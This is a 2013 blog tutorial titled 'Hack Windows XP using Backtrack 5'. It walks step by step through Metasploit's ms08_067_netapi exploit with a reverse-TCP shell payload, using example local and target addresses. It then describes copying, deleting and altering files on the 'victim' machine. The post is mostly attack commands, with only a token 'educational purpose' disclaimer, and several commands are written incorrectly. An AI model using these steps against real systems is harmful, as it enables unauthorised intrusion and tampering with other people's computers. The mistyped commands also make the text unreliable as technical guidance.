Jan 23, 2013

Hack Windows XP using Backtrack 5.....

Hack Windows Xp Using Backtrack 5
Hack Windows XP using msfconsole 


Open terminal and write msfconsole 
msf > msfconsole

 When you open msfconsole ,it will show this type of interface

 Step 2: In this step , first set the payload to set payload write 
msf > set payload windows/shell/reverse_tcp



Step3 : In step 3 , set the exploit . Write as shown below -
msf > set exploit/windows/smb/ms08_067_netapi


Step4 :Now set lhost and rhost , Here lhost is the local host and rhost is the remote host .See the above image how I set lhost & rhost.


Setting Local Host

Syntax : set lhost <our own address>
Example :
msf > exploit(ms08_067_netapi) >lhost 192.168.127.131

Setting Remote Host

Syntax : set rhost <Remote or target ip address>
Example :
       msf > exploit(ms08_067_netapi)>rhost 192.168.127.129




Now Enter show options 


 msf > exploit(ms08_067_netapi)> show options


Step 5 : In this step it shows the LHOST(Local Host) AND RHOST(Remote Host) Settings.
 Step 6 : Exploit : In this step we are ready to exploit the  Target . 
      To start exploit give the command :-


msf > exploit(ms08_067_netapi)>exploit

Exploit will successfully done . You can see the above image . In the image windows shell is showing on Backtrack 5 .


Example 1 : Here you can see both the Operating System.You can see the windows Xp directories are showing in Backtrack 5 also.


EXAMPLE 2  : Here we make a new directory on Backtrack 5 using md command . We make a hackingdna directory  as shown on both Operating System .





Example 3 :  Here we Use systeminfo command to see the system inforamtion of windows xp . 


If you known , how to use DOS , you can do anything on victim operatng system -

  • You can copy file .
  • You can delete files
  • You can create new directory 
  • You can made changes in his system . 
This is how we can  ----[ HACK THE WINDOWS OPERATING SYSTEM ]----
                                                      [THROUGH ]
                                                   [BACKTRACK 5]     
Note : This article is just for educational purpose only /-

No comments:

Post a Comment